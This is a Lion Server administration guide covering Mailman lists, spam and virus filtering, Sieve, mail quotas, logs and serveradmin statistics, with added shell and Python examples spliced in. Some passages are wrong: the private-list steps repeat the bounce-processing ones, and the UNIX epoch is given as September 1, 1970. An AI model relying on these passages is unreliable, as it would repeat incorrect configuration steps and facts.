You use the web interface to set the mailing list description. Web services must be enabled to access the web-based interface. Sometimes it's difficult to know the scope and subject matter of a mailing list from the short list name. The list information page contains a description of the list, the subject matter it covers, and (optionally) who is permitted to subscribe. These details are especially good for self-subscription lists. A potential subscriber can decide whether to subscribe based on the list's description.

1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password and click Let me in.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. Make sure that General Options is selected from the Configuration Categories link section.
4. Enter a short phrase in the description text box.
5. In the info text box, enter information about the list, its rules, and its content expectations.
6. Click Submit Your Changes.

Customize the mailing list welcome message
You use the web interface to set the mailing list welcome message. Web services must be enabled to access the web interface.
When subscribers join a mailing list, by assignment or self-subscription, they receive an automated welcome message. The message explains where to find the list archives and how to unsubscribe. You can customize it by adding text, describing the list culture and rules, or including other information for the subscribers.
1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. Make sure that General Options is selected from the Configuration Categories link section.
4. Enable Send welcome message to newly subscribed members.
5. Enter the text to include in the List-specific text prepended text box.
6. Click Submit Your Changes.

Customize the mailing list unsubscribe message
You use the web interface to set the mailing list unsubscribe message. Web services must be enabled to access the web interface.
When a user is unsubscribed from a mailing list, by the list administrator or by unsubscribing, the user receives an automated unsubscribe message. The message confirms the unsubscribing. You can customize it by adding information you want users to have upon leaving the list.
1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password and click Let me in.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. Make sure that General Options is selected from the Configuration Categories link section.
4. Enable Send goodbye message to members.
5. Enter the text to include in the Text sent to people leaving the list text box.
6. Click Submit Your Changes.

Enable a mailing list moderator
You use the web interface to set mailing list moderation. Web services must be enabled to access the web interface.
You can create a moderated list where the posts must be approved by a list administrator before the post is sent. You designate list moderators who have limited administrative privileges. They can't change list options but they can approve or reject subscription requests and postings.

When moderators enter their password in the list administration page, they get a page with their own moderating tasks available.
1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. Make sure that General Options is selected from the Configuration Categories link section.
4. Enter the list moderator addresses to include in the "The list moderator mail addresses" text box.
5. Click Submit Your Changes.
6. In the Configuration Categories link section, select Password Options.
7. Enter a password in the moderator password field and confirm it.
8. Click Submit Your Changes.

Set mailing list bounce options
You use the web interface to set mailing list bounce options. Web services must be enabled to access the web interface.
When a list message bounces and returns to the list server, you can choose how the list server handles the resulting bounce message.
1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. In the Configuration Categories link section, select Bounce Processing.
4. Select bounce processing options. Each option section has a link to a help page that explains the option setting.
5. Click Submit Your Changes.

Designate a mailing list as private
You use the web-based interface to set a list's privacy options. Web services must be enabled to access the web-based interface.
You might not want to show some lists on the web list access page. To designate a list as private so it isn't shown, see server.domain.tld/mailman/listinfo.
1. In a web browser, enter the URL of the list administration page. This is usually server.domain.tld/mailman/admin/listname.
2. Enter the master list password.
This is not the user's login password. The master list password was set when mailing lists were enabled on the server. It was mailed to list administrators designated at that time.
3. In the Configuration Categories link section, select Bounce Processing.
4. Select bounce processing options. Each option has a link to a help page that explains the option.
5. Click Submit Your Changes.

Add subscribers
Use Server Admin to add mailing list subscribers to a list. Mailing list subscribers do not need an account (mail or file access) on the list's server. Any mail address can be added to the list. You must have an existing list to add a subscriber.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Mailing Lists tab.
4. Select the list to add a subscriber to.
5. Under the Members pane, click the Add button (+).
6. Enter the recipient's mail address.
If you're entering multiple subscribers, enter the recipient mail addresses or drop a text list into the User Identifiers box. If the subscribers are users on the mail server, you can use the Users and Groups button to add local groups to the list.
7. Choose from the following subscriber privileges:
Users subscribed to list: This means the user will receive mail sent to the list address.
Users may post to list: This means the list will accept mail from the user.
Users can administer list: This means the user has administrative privileges for the list.
8. Click OK.

User collaboration services

Mail

Mail service configuration

Mail service filtering


Mail service uses SpamAssassin to filter spam, or junk mail, from incoming mail messages. Mail service uses ClamAV to detect viruses in mail messages. Both tools are managed in the Filters pane of Mail Settings in Server Admin.

Enable junk mail screening (Bayesian filters)
Before you can benefit from mail screening, it must be enabled. While enabling screening, you configure screening parameters.
Bayesian mail filtering is the classification of mail messages based on statistics. Each message is analyzed and word frequency statistics are saved. Mail messages that have more of the same words as those in junk mail receive a higher marking of probability that they are also junk mail. When the message is screened, the server adds a header (X-Spam-Level) with the junk mail probability score.
For example, suppose you have 400 mail messages where 200 of them are junk and 200 are good mail. When a message arrives, its text is compared to the 200 junk mail and the 200 good messages. The filter assigns the incoming message a probability of being junk or good, depending on what group it most resembles.
Bayesian filtering has shown itself to be a very effective method of finding junk mail if the filter has enough data to compare. One strength of this method is the more mail you get and classify (a process called training), the more accurate the next round of classification is. Even if junk mail senders alter their mailings, the filter takes that into account the next time around.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Filters tab.
4. Select Scan Mail for Junk Mail.
5. Set the level of permissiveness (Cautious, Moderate, Aggressive).
The permissiveness meter sets how many junk mail flags can be applied to a message before it is processed as junk mail. If you set it to Least permissive, mildly suspicious mail is tagged and processed as junk mail. If you set it to Most permissive, it takes a high score (in other words, many junk mail characteristics) to mark it as junk.
6. Choose from the following to deal with junk mail messages:
Choice | Description
Bounced | Sends the message back to the sender. You can optionally send a mail notification of the bounce to a mail account, probably the postmaster.
Deleted | Deletes the message without delivery. You can optionally send a mail notification of the bounce to a mail account, probably the postmaster.
Delivered | Delivers the message even though it's probably junk mail. You can optionally add text to the subject line, indicating that the message is probably junk mail, or encapsulate the junk mail as a MIME attachment.
Redirected | Delivers the message to someone other than the intended recipient.

7. Choose how often to update the junk mail database.
8. Click Save.

Training the junk mail filter with user help
1. Enable junk mail filtering.
2. Create two local accounts: junkmail and notjunkmail.
3. Use the Server app to enable them to receive mail.
4. Instruct mail users to redirect junk mail messages that have not previously been tagged as junk mail to junkmail@<yourdomain>.
5. Instruct mail users to redirect real mail messages that were wrongly tagged as junk mail to notjunkmail@<yourdomain>.
Each day at 2:15 am, the junk mail filter will learn what is junk and what was mistaken for junk.
6. Delete the messages in the junkmail and notjunkmail accounts daily.

Training the junk mail filter without user interaction
You can also train the junk mail filter by giving it known junk and good mail messages. Accurate training requires a large sample, so a minimum of 200 messages of each type is advised.
1. Choose a mailbox of 200 messages made of only junk mail.
2. Use Terminal and the filter's command-line training tool to analyze and remember junk mail using the following command:
sa-learn --showdots --spam sample junk mail directory/*
3. Choose a mailbox of 200 messages made of only good mail.
4. Use Terminal and the filter's command-line training tool to analyze and remember good mail using the following command:
sa-learn --showdots --ham sample good mail directory/*

If the junk mail filter fails to identify a junk mail message, train it again so it can do better next time. Use sa-learn again with the --spam argument on the mislabeled message. Likewise, if you get a false positive (a good message marked as junk mail), use sa-learn again with the --ham argument to further train the filter.

Filtering mail by language and locale
You can filter incoming mail based on locales or languages. Mail messages composed in foreign text encodings are often erroneously marked as junk mail. You can configure your mail server to not mark messages from designated originating countries or languages as junk mail.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Filters tab.
4. Select Scan Email for Junk Mail.
5. Click the Edit (/) button next to Accepted Languages to change the list, select the language encodings to allow as non-junk mail, and click OK.
6. Click the Edit (/) button next to Accepted Locales to change the list, select the country codes to allow as non-junk mail, and click OK.

7. Click Save.

Enabling Virus Screening
Before you can benefit from mail screening, it must be enabled. While enabling screening, you configure screening parameters.
Lion Server uses ClamAV (from www.clamav.net) to scan mail messages for viruses. If a suspected virus is found, you can deal with it several ways, described below. The virus definitions are kept up to date (if enabled) via the Internet using a process called freshclam.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Filters tab.
4. Select Scan Email for Viruses.
5. Choose from the following to deal with junk mail messages.
Choice | Description
Bounced | Sends the message back to the sender. You can optionally send a mail notification of the bounce to a mail account (probably the domain's postmaster) and notify the intended recipient.
Deleted | Deletes the message without delivery. You can optionally send a mail notification to a mail account, probably the postmaster, as well as the intended recipient.
Redirected | Delivers the message to a designated address for further analysis.

6. Choose whether to notify the intended recipient if the message was filtered.
7. Choose how often to update the virus database. A minimum of twice a day is suggested. Some administrators choose eight times a day.
8. Click Save.
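The unattended training procedure above (sa-learn with --spam and --ham on a directory of messages) can be wrapped so that the 200-message minimum is enforced before the Bayes database is touched. This is an added shell example, not Lion Server's own tooling; the SA_LEARN override, the count_messages and train_filter names, and the one-message-per-file directory layout are assumptions.

```shell
#!/bin/sh
# Added example: wrapper for training SpamAssassin's Bayesian filter with
# sa-learn, enforcing the advice above of at least 200 messages per class.
# Not Lion Server's own tooling. SA_LEARN lets a test substitute the binary.

SA_LEARN=${SA_LEARN:-sa-learn}   # assumption: sa-learn is on PATH
MIN_MESSAGES=200                 # minimum sample size recommended above

# count_messages DIR -> prints the number of regular files in DIR
# (assumes one message per file, as in a Maildir-style folder)
count_messages() {
    find "$1" -maxdepth 1 -type f | wc -l | tr -d ' '
}

# train_filter CLASS DIR -> CLASS is "spam" (junk) or "ham" (good mail).
# Returns 1 without touching the filter if the class is unknown, DIR is
# missing, or the sample is too small, so a typo cannot mistrain the
# Bayes database with the wrong class or with too little data.
train_filter() {
    class=$1
    dir=$2
    case "$class" in
        spam|ham) ;;
        *) echo "train_filter: class must be spam or ham, got '$class'" >&2
           return 1 ;;
    esac
    if [ ! -d "$dir" ]; then
        echo "train_filter: $dir is not a directory" >&2
        return 1
    fi
    n=$(count_messages "$dir")
    if [ "$n" -lt "$MIN_MESSAGES" ]; then
        echo "train_filter: only $n messages in $dir; need $MIN_MESSAGES" >&2
        return 1
    fi
    # Mirrors the documented commands:
    #   sa-learn --showdots --spam <dir>/*
    #   sa-learn --showdots --ham  <dir>/*
    "$SA_LEARN" --showdots "--$class" "$dir"/*
}

# Usage (paths are placeholders):
#   train_filter spam /path/to/known-junk && train_filter ham /path/to/known-good
```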

User collaboration services

Mail

Mail service configuration

Server-side mail rules


Lion Server supports Sieve scripts to process server-side mail rules. For Sieve to function, you must enable its communications port.
Sieve is an Internet standard mail filtering language for server-side filtering. Sieve scripts interact with incoming mail before final delivery. Sieve acts much like rules in mail programs to sort or process mail based on user-defined criteria. Sieve can provide such functions as vacation notifications, message sorting, and mail forwarding.
Sieve scripts are kept for each user on the mail server at /Library/Server/Mail/Data/rules/GUID. The directory is owned by Mail service, so users normally don't have access to it and can't put their scripts there for mail processing. For security purposes, users and administrators upload their scripts to a Sieve process, managesieve, which transports the scripts to the mail process for the user. Place scripts for all users in the central script repository at /usr/sieve/.
By default, Sieve has the vacation extension.
To enable Sieve support
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Filters tab.
4. Select Enable server side mail rules.

RELATED INFORMATION

Sample Sieve Scripts

User collaboration services

Mail

Mail service configuration

Manage mail quotas


A quota is set for all users in Server app. Mail quotas define how much disk space a user's mail can use on the mail server. Although you don't set a mail user's quota in Server Admin, you do manage quota enforcement and your server's response to quota violation.
Mail quotas are especially important if the mail server hosts many IMAP accounts. IMAP doesn't require mail to be removed from the server when read, so IMAP users who get large attachments can fill their quotas quickly.

Limit incoming message size
You can set a maximum size for incoming messages. The default is 10 MB. You might not want to allow large attachments that add to the message size.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Quotas tab.
4. Click the "Refuse messages larger than" checkbox and enter the number of megabytes as the limit.
5. Click Save.

Enable mail quotas for users
You can enable limits to mail storage on the server. This is especially important if you use IMAP for incoming messages because mail messages aren't necessarily deleted when downloaded to the user.
1. In the Mail Server pane of the Server app, select the checkbox labeled "Limit mail to 200 MB per user."
2. Optionally, change the default 200 MB to your limit.

View a user's quota usage
When a mail user is over quota, Server Admin (in the Mail > Maintenance > Accounts pane) reports a percent free, which is negative. This percent is proportional to the amount the user is over quota. For example, suppose a user has a 200 MB quota and has received 205 MB of mail. This is 5 MB over quota, which is 2.5% over quota. Server Admin reports this as -2.5% of quota.

Configure quota warnings
When a user's mailbox approaches its storage quota, you can warn users of an impending quota violation. You choose whether to warn the mail user, how often to warn him or her, and at what point to send the warning.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Quotas tab.
4. Click Enable quota warnings.
5. Enter the maximum percentage of storage usage before a warning is sent.
6. Enter the frequency of the warning notice, in number of days.
7. To customize the quota warning notification, click Edit Quota Warning Message and customize the message.
8. Click Save.

Configure quota violation responses
When a mail user has more mail in storage than is allowed for his or her quota, the mail server recognizes a quota violation. There are typically two responses to quota violation: a violation notice, and suspension of mail service.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Quotas tab.
4. Click Enable Quota Warnings.
5. To customize the quota violation notification, click Edit Quota Warning Message, then customize the message.
6. To suspend mail service for users who exceed their quotas, select "Disable a user's incoming mail when they exceed 100% of quota."
7. To customize the over-quota message, click Edit Over Quota Error Message and then customize the message.
8. Click Save.

User collaboration services

Mail

Mail service configuration

Configure mail client applications


Users must configure their mail client software to connect to Mail service. The following table details the information most mail clients need and the source of the information in Lion Server.

Mail client software | Lion Server | Examples
User name | Full name of the user | Vivian Li
Account name or Account ID | Short name of user account | vivian
Password | Password of user account |
Host name, Mail server, Mail host | Mail server's full DNS name or IP address, as used when you log in to the server in Server Admin | mail.example.com, 192.168.50.1
Mail address | User's short name, followed by the @ symbol, followed by one of the following: the server's Internet domain (if the mail server has an MX record in DNS); the mail server's full DNS name; the server's IP address in brackets | vivian@example.com, vivian@mail.example.com, vivian@[192.168.50.1]
SMTP host, SMTP server | Same as host name | mail.example.com, 192.168.50.1
POP host, POP server | Same as host name | mail.example.com, 192.168.50.1
IMAP host, IMAP server | Same as host name | mail.example.com, 192.168.50.1
SMTP user | Short name of user account | vivian
SMTP password | Password of user account |

User collaboration services

Mail

Mail service configuration

Set up mail server clustering with Xsan


With Xsan, you can cluster multiple mail servers that share the mail store. This provides mission-critical redundancy and high performance and allows you to easily maintain the pooled storage using Xsan tools and software. Each server also has a primary SMTP spool file. If a server goes offline, another node in the cluster takes over processing of the failed server's spool file. This happens automatically, but you see it noted in log files.

You can configure your mail server to join an existing mail cluster as a new member of the cluster, or you can migrate a mail server's mail store to another server that is a member of the cluster. If Xsan software is installed, you can also create a cluster, with the current server becoming the cluster's first member.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Advanced.
3. Click Clustering.
4. Click the Change button, then follow the onscreen instructions that appear.
After a server has joined a cluster, changes to mail server settings, such as SMTP, POP, IMAP, and logging, affect all servers in the cluster. When you remove the last member of a cluster, you must designate a server to take over as a standard mail server.

User collaboration services

Mail

Monitor Mail service

Set Mail service logging options


Mail service log settings are customizable. Mail service logs can show the following levels of reported detail:

Level | Description
Debug | All debugging information
Information | Connection transactions, delivery attempts, authentication attempts
Notice | Authentication failures
Critical | Errors that require prompt administration attention
Warning | All warnings and errors
Errors | All errors

You can choose log detail for each service category (outgoing, incoming, or junk mail filter).

Set the Mail service log detail
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Settings.
3. Select the Logging tab.
4. Select the service whose log detail you want to set:

Service | Description
SMTP | Outgoing mail and connections from external mail servers
POP/IMAP | Incoming mail retrieval for users
Junk Mail/Virus | The junk Mail service

5. From the Log Detail Level pop-up menu, choose a detail level.
6. Click Save.

Archiving Mail service logs by schedule
Lion Server archives Mail service logs after a specified time. Each archive log is compressed and uses less disk space than the original log file. You can customize the schedule to archive the logs after a set period of time, measured in days.
1. In Server Admin, select Mail in the Computer & Services list.
2. Click Settings.
3. Select the Logging tab.
4. Click Archive Logs Every ____ Days.
5. Enter the number of days.
6. Click Save.

User collaboration services

Mail

Monitor Mail service

View Mail service settings from the command line


Use the serveradmin command to view Mail service settings from the command line.
To view Mail service configuration settings
$ sudo serveradmin settings mail

To view a specific setting
$ sudo serveradmin settings mail:setting

To view a group of settings
You can view a group of settings that have part of their names in common by entering as much of the name as you want, stopping at a colon (:), and entering an asterisk (*) as a wildcard for the remaining parts of the name. Example:
$ sudo serveradmin settings mail:imap:*

User collaboration services

Mail

Monitor Mail service

View an overview of Mail service activity


You can obtain an overview of Mail service that reports whether the service is running, when Mail service started, and incoming and outgoing connections by protocol.
To see an overview of Mail service activity
1. In Server Admin, select Mail in the Computer & Services list.
2. Click the Overview button.
To see a summary status of Mail service from the command line
$ sudo serveradmin status mail

To see a detailed status of Mail service from the command line
$ sudo serveradmin fullstatus mail

User collaboration services

Mail

Monitor Mail service

View Mail service logs


Viewing Mail service logs and reclaiming space used by logs. Mail service maintains the following logs:

Log | Description
Mail Access | General Mail service information is stored in this log.
IMAP Log | IMAP activity is stored in this log.
POP Log | POP activity is stored in this log.
SMTP Log | SMTP activity is stored in this log.
Mailing List Logs | These record Mailman activity, including service, error, delivery, delivery failures, postings, and subscriptions.
Junk Mail and Virus Logs | These record activity for mail filtering, including virus definition updates (freshclam log), virus scanning (clamav log), and mail filtering (amavis log).

To view a Mail service log
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click the Logs button.
3. From the View pop-up menu, choose a log type.
4. Click Save.
To search for specific entries, use the text filter box in the window.

From the command line
You can use tail or another file-listing tool to view the contents of Mail service logs.
1. Use the serveradmin getLogPaths command to see where Mail service logs are located:
$ sudo serveradmin command mail:command = getLogPaths
2. View the latest entries in your selected log with the tail command.
a. To view the last 10 entries in the Junk Mail/Virus Scanning log:
$ tail /var/log/amavis.log
b. To view any number of entries:
$ tail -n lines /var/log/amavis.log
Replace lines with the number of lines you want to view.
c. To watch new additions to the log file:
$ tail -f /var/log/amavis.log
Control-C stops the tail command from watching the log file and returns your command prompt.

Reclaim disk space used by Mail service log archives
Lion Server reclaims disk space used by Mail service logs when they reach a specified size or age. You can use the diskspacemonitor command-line tool to monitor disk space when you want, and delete or move the log archives. For additional information, see the diskspacemonitor man page.

User collaboration services

Mail

Monitor Mail service

View the Mail connections list


Server Admin can list the users who are connected to Mail service. For each user, you see the user name, IP address of the client computer, type of mail account (IMAP or POP), number of connections, and connection length.

1. In Server Admin, select Mail in the Computer & Services list.
2. Click the Connections button.

User collaboration services

Mail

Monitor Mail service

View Mail accounts


You can use Server Admin to see a list of users who have used their mail accounts at least once. For each account, you see the user name, disk space quota, disk space used, and percentage of space available to the user. Mail accounts that have never been used aren't listed.

1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Maintenance.
3. Click the Accounts button.

User collaboration services

Mail

Monitor Mail service

Monitor the outgoing mail queue


You might need to check mail that is waiting to be sent. If you have a message backlog, or if you have interrupted outbound mail, you might have a number of items in the queue. Additionally, you might want to monitor mail delivery to ensure that mail is being delivered to local and remote hosts.

Check the outgoing mail queue
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Maintenance.
3. Click the Mail Queue tab.
4. To inspect a message, select it.

Clear messages from the outgoing mail queue
Your outgoing mail queue might have a backlog of messages. These are messages that can't be sent for any number of reasons: the message might be improperly addressed, the destination server might be unresponsive, or the destination account might be over quota. In such circumstances, you might want to clear messages from the queue backlog.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Maintenance.
3. Click the Mail Queue tab.
4. Select the message to delete.
5. Click Delete.

Retry sending undelivered outgoing messages
Sometimes the outgoing mail queue has undelivered messages that are properly addressed, but for some reason the messages aren't sent (for example, if the destination server is down, or if the firewall is blocking the outgoing port for SMTP). You can attempt to send the messages again. Normally, the mail server attempts to resend, but you can activate it manually instead of waiting.
1. In Server Admin, select a computer in the Servers list, then select Mail.
2. Click Maintenance.
3. Click the Mail Queue tab.
4. Select the message to retry sending. To select more than one message, hold down the Shift or Command keys.
5. Click Retry.
While doing this you can monitor the logs to see what might be causing the problem.

RELATED INFORMATION

View Mail service logs

User collaboration services

Mail

Monitor Mail service

View Mail service statistics


You can use the serveradmin getHistory command to display a log of periodic samples of the number of user connections and the data throughput. Samples are taken once each minute.

1. In Terminal, enter the following:
$ sudo serveradmin command
The serveradmin command prompt appears.
2. Enter the following in the serveradmin command prompt:
mail:command = getHistory
mail:variant = statistic
mail:timeScale = scale
Replace statistic and scale with the following:

Parameter | Description
statistic | The value you want to display. Valid values include: v1 - Number of connected users (average during sampling period); v2 - Data throughput (bytes/sec)
scale | The length of time in seconds, ending with the current time, you want to see samples for. For example, to see 24 hours of data, you would specify mail:timeScale = 86400.

3. Press Control-D to save and exit the serveradmin command prompt.

The computer responds with the following output:
mail:nbSamples = <samples>
mail:v2Legend = "throughput"
mail:samplesArray:_array_index:0:vn = <sample>
mail:samplesArray:_array_index:0:t = <time>
mail:samplesArray:_array_index:1:vn = <sample>
mail:samplesArray:_array_index:1:t = <time>
[...]
mail:samplesArray:_array_index:i:vn = <sample>
mail:samplesArray:_array_index:i:t = <time>
mail:v1Legend = "connections"
afp:currentServerTime = <servertime>

Parameter | Description
<samples> | The total number of samples listed.
<sample> | The numerical value of the sample. For connections (v1), this is the integer average number of users. For throughput (v2), this is integer bytes per second.
<time> | The time when the sample was measured. A standard UNIX time (number of seconds since September 1, 1970). Samples are taken every 60 seconds.
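A small parser for the getHistory output shown above, as an added shell example that is not part of Lion Server: it lists the samples in order, finds the peak, and flags any two consecutive samples more than the 60-second sampling period apart, which is a quick way to spot intervals in which the service was not running. SAMPLE_HISTORY is constructed in the documented output format and assumes a mail:variant = v1 (connections) query, so the value lines end in :v1.

```shell
#!/bin/sh
# Added example: parse "serveradmin command" getHistory output for Mail service.
# Not part of Lion Server. SAMPLE_HISTORY is constructed in the documented output
# format for a mail:variant = v1 (connections) query over five samples, with a
# deliberate gap between the third and fourth sample.

SAMPLE_HISTORY='mail:nbSamples = 5
mail:v2Legend = "throughput"
mail:samplesArray:_array_index:0:v1 = 3
mail:samplesArray:_array_index:0:t = 1325750400
mail:samplesArray:_array_index:1:v1 = 5
mail:samplesArray:_array_index:1:t = 1325750460
mail:samplesArray:_array_index:2:v1 = 9
mail:samplesArray:_array_index:2:t = 1325750520
mail:samplesArray:_array_index:3:v1 = 2
mail:samplesArray:_array_index:3:t = 1325751000
mail:samplesArray:_array_index:4:v1 = 4
mail:samplesArray:_array_index:4:t = 1325751060
mail:v1Legend = "connections"
afp:currentServerTime = 1325751090'

# history_samples FILE -> one "time value" line per sample, ordered by sample
# index. The key is split on ":" so the index is field 4 and the leaf
# (v1, v2 or t) is field 5; the value is the third whitespace field after "=".
history_samples() {
    awk '$1 ~ /^mail:samplesArray:_array_index:/ {
             split($1, p, ":")
             if (p[5] ~ /^v[0-9]+$/) val[p[4]] = $3
             else if (p[5] == "t")   tm[p[4]] = $3
             if (p[4] + 0 > max) max = p[4] + 0
         }
         END { for (i = 0; i <= max; i++) if (i in tm) print tm[i], val[i] }' "$1"
}

# history_peak FILE -> "value time" of the largest sample
history_peak() {
    history_samples "$1" | awk 'NR == 1 || $2 + 0 > best { best = $2 + 0; at = $1 }
                                END { if (NR) print best, at }'
}

# history_gaps FILE [INTERVAL] -> "prev next delta" for each pair of consecutive
# samples more than INTERVAL seconds apart (default 60, the sampling period)
history_gaps() {
    history_samples "$1" | awk -v step="${2:-60}" '
        NR > 1 && $1 - prev > step { print prev, $1, $1 - prev }
        { prev = $1 }'
}

# Demonstration on the constructed sample.
HIST=$(mktemp)
printf '%s\n' "$SAMPLE_HISTORY" > "$HIST"
echo "== samples (time value)";  history_samples "$HIST"
echo "== peak (value time)";     history_peak "$HIST"
echo "== gaps longer than 60 s"; history_gaps "$HIST"
rm -f "$HIST"
```

Save the serveradmin output to a file first (for example by redirecting the serveradmin session's output) and pass that path to the functions.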

User collaboration services

Mail

Solve Mail service problems

Improve performance
Mail service must act very fast for a short period of time. It sits idle until a user reads or sends a message, then it transfers the message immediately. Therefore, it puts intense but brief demands on the server. As long as other services do not place heavy continuous demands on a server (for example, as a QuickTime streaming server would), the mail server can typically handle several hundred connected users. As the number of connected mail users increases, the demand of Mail service on the server increases.
If Mail service performance needs improvement, try the following:
Move the mail storage location to its own hard disk or hard disk partition.
Run other services on a different server, especially services that place frequent heavy demands on the server.

User collaboration services

Mail

Solve Mail service problems

If mail is undeliverable
Mail messages might be undeliverable for several reasons. Incoming mail might be undeliverable because it has a misspelled address or is addressed to a deleted user account. Outgoing mail might be undeliverable because it's misaddressed or the destination mail server isn't working.
You can configure Mail service to:
Forward undeliverable incoming mail. Mail service can forward messages that arrive for unknown local users to another local person or a group in your organization. Whoever receives forwarded mail that's incorrectly addressed (with a typo in the address, for example) can forward it to the correct recipient. If forwarding of these undeliverable messages isn't explicitly enabled, the messages are returned to sender.
Limit the number of attempts to deliver problematic outgoing mail.
Report failed delivery attempts.
Use a different timeout value to increase the chance of connection success.

Configure additional Mail service support for 8-bit MIME

To deliver 8-bit character-encoded mail messages intact, disable the output conversion that Postfix performs by default. Postfix converts a message from 8-bit MIME to 7-bit encoding when the receiving system does not announce 8BITMIME support, and mail systems that use 8-bit text encodings (Asian-language mail systems, for example) can then display the converted message garbled. Use the postconf command-line tool to disable the conversion.

1. Log in to your server as the administrator.
2. In Terminal, enter the following command:

sudo postconf -e disable_mime_output_conversion=yes

This turns off the 8BITMIME-to-7-bit conversion. With the conversion disabled, Postfix hands an 8-bit message to the next hop unchanged even when that system did not advertise 8BITMIME, so a strictly 7-bit relay on the path may reject or mangle it.
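The decision described above, as an added example that is not part of this page or of Postfix itself: a message is sent with its 8-bit body when the destination's EHLO reply lists 8BITMIME, converted to a 7-bit transfer encoding when it does not, and sent unchanged in either case when the disable_mime_output_conversion flag is set. The EHLO replies and the message body are constructed; Python's email package does the conversion (to base64 for UTF-8 text), which stands in for Postfix's own conversion code.

```python
import email
from email import policy
from email.message import EmailMessage

# Constructed sample: a UTF-8 body that needs 8-bit bytes on the wire.
SAMPLE_TEXT = "件名テスト: 8ビット本文です。\n"

# Constructed EHLO replies; only the second destination advertises 8BITMIME.
EHLO_7BIT_ONLY = ["250-mx.example.org", "250-SIZE 10240000", "250 HELP"]
EHLO_8BITMIME = ["250-mx.example.net", "250-SIZE 10240000", "250-8BITMIME", "250 HELP"]

def build_8bit_message(text=SAMPLE_TEXT):
    """An outgoing message as submitted by a client: Content-Transfer-Encoding 8bit, charset UTF-8."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.net"
    msg["Subject"] = "8BITMIME test"
    msg.set_content(text, charset="utf-8", cte="8bit")
    return msg.as_bytes(policy=policy.SMTP)

def destination_accepts_8bit(ehlo_lines):
    """True if the EHLO reply lists the 8BITMIME extension (RFC 6152)."""
    for line in ehlo_lines:
        words = line[4:].split()          # strip the "250-" / "250 " prefix
        if words and words[0].upper() == "8BITMIME":
            return True
    return False

def is_7bit_clean(raw):
    return all(b < 0x80 for b in raw)

def prepare_for_delivery(raw, ehlo_lines, disable_mime_output_conversion=False):
    """Return the bytes to transmit to the next hop for the given EHLO reply."""
    msg = email.message_from_bytes(raw, policy=policy.SMTP)
    if destination_accepts_8bit(ehlo_lines) or disable_mime_output_conversion:
        return msg.as_bytes(policy=policy.SMTP)                       # 8-bit body passes through
    return msg.as_bytes(policy=policy.SMTP.clone(cte_type="7bit"))    # re-encode body as 7-bit

def body_text(raw):
    """Decode the body the way a receiving client would, whichever encoding was used."""
    return email.message_from_bytes(raw, policy=policy.default).get_content()

if __name__ == "__main__":
    raw = build_8bit_message()
    for name, ehlo in (("7-bit-only relay", EHLO_7BIT_ONLY), ("8BITMIME relay", EHLO_8BITMIME)):
        out = prepare_for_delivery(raw, ehlo)
        print(name, "-> 7-bit clean:", is_7bit_clean(out), "| body intact:",
              body_text(out).rstrip() == SAMPLE_TEXT.rstrip())
    forced = prepare_for_delivery(raw, EHLO_7BIT_ONLY, disable_mime_output_conversion=True)
    print("conversion disabled -> 7-bit clean:", is_7bit_clean(forced))
```

Note that a correct conversion keeps the body readable (the base64 form decodes back to the same text); the garbling the page describes happens when the receiving side does not decode the converted form properly, which is why disabling the conversion is only safe when every hop genuinely handles 8-bit data.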

User collaboration services

Podcast

About the Lion Server podcast library

Lion Server introduces a new podcast library that integrates with Wiki Server 3. With Mac OS X Lion, podcasting is even easier. Use the new Podcast Publisher application to develop the content for your podcasts. (Podcast Publisher is included with Mac OS X Lion and can be found in the Utilities folder of Launchpad.) You then upload them to the Lion Server podcast library. The podcast library is integrated with Wiki Server 3, giving your users a consistent experience across wiki pages and podcasts. It also makes management of the podcast library easier for you.

The Lion Server podcast library:

- Gives users a clean, consistent page where they can discover new and interesting podcasts.
- Allows you to assign content control to other administrators, so they can easily remove outdated or otherwise irrelevant content.
- Provides a simple mechanism for you to limit who can see episodes on a particular feed, using the same users and groups that Wiki Server 3 uses.

Note: If you have an existing Podcast Producer infrastructure, you can continue to use it with Lion Server. As well as having access to Podcast Composer and Podcast Capture as before, you can also send content generated in Podcast Publisher directly to a Podcast Producer workflow.

Set up a podcast library

To set up a podcast library, download and install the server components of Mac OS X Lion. You can set up a podcast library to provide a common location for publishing podcasts. You can share podcast episodes to the podcast library from the Podcast Publisher application in Mac OS X Lion or from podcast workflows you set up using Podcast Composer in earlier versions of Mac OS X Server.

1. Open the Server app and select the Podcast service on the left, under Services. If you have more than one server, select Podcast for the server that will host the podcast library.
2. Use the "Podcast library is viewable by" pop-up menu to choose who can access the library:
   - Anyone: Allows all users to view podcast episodes in the library.
